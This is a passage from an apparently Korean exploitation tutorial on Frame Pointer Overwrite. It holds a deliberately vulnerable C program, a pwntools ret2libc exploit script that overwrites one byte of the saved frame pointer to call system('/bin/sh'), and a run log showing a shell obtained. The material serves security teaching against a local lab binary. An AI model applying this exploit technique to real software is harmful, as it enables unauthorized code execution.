...
- 다음 코드를 이용하여 Frame Pointer Overwrite의 동작을 확인하겠습니다.
- 해당 프로그램은 Stack address, Libc address를 출력합니다.
- Stack address: buf
- Libc address: printf_addr
- read()함수를 이용해 사용자로 부터 63개의 문자를 입력 받습니다.
- 이로 인해 Frame pointer영역에 1byte를 Overwrite 할 수 있습니다.
- 해당 프로그램은 Stack address, Libc address를 출력합니다.
| Code Block | ||
|---|---|---|
| ||
//gcc -m32 -fno-stack-protector -o fpo fpo.c -ldl
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>
void vuln(){
char buf[50];
printf("buf[50] address : %p\n",buf);
void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
printf("Printf() address : %p\n",printf_addr);
read(0, buf, 63);
}
void main(int argc, char *argv[]){
if(argc<2){
printf("argv error\n");
exit(0);
}
vuln();
} |
...
| Code Block | ||||
|---|---|---|---|---|
| ||||
from pwn import *
p = process(['./fpo','AAAA'])
p.recvuntil('buf[50] address : ')
tmp = p.recv(10)
stackAddr = int(tmp,16)
stackAddr += 0x8
onebyte = int(tmp[8:11],16)
onebyte += 0x4
p.recvuntil('Printf() address : ')
libc = p.recvuntil('\n')
libc = int(libc,16)
libcBase = libc - 0x49020
sysAddr = libcBase + 0x3a940
exit = libcBase + 0x2e7b0
binsh = libcBase + 0x15902b
print "StackAddr : " + hex(stackAddr)
print "onebyte : " + hex(onebyte)
print "libc base : " + hex(libcBase)
print "system() : " +hex(sysAddr)
print "exit() : " +hex(exit)
print "binsh : " + hex(binsh)
exploit = p32(stackAddr)
exploit += p32(sysAddr)
exploit += p32(exit)
exploit += p32(binsh)
exploit += '\x90' * (62 - len(exploit))
exploit += p32(onebyte)
p.send(exploit)
p.interactive() |
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/FPO$ python Exploitexploit.py [+] Starting local process './fpo': pid 4830 StackAddr : 0xffc98542 onebyte : 0x3e libc base : 0xf7d8d000 system() : 0xf7dc7940 exit() : 0xf7dbb7b0 binsh : 0xf7ee602b [*] Switching to interactive mode $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |
...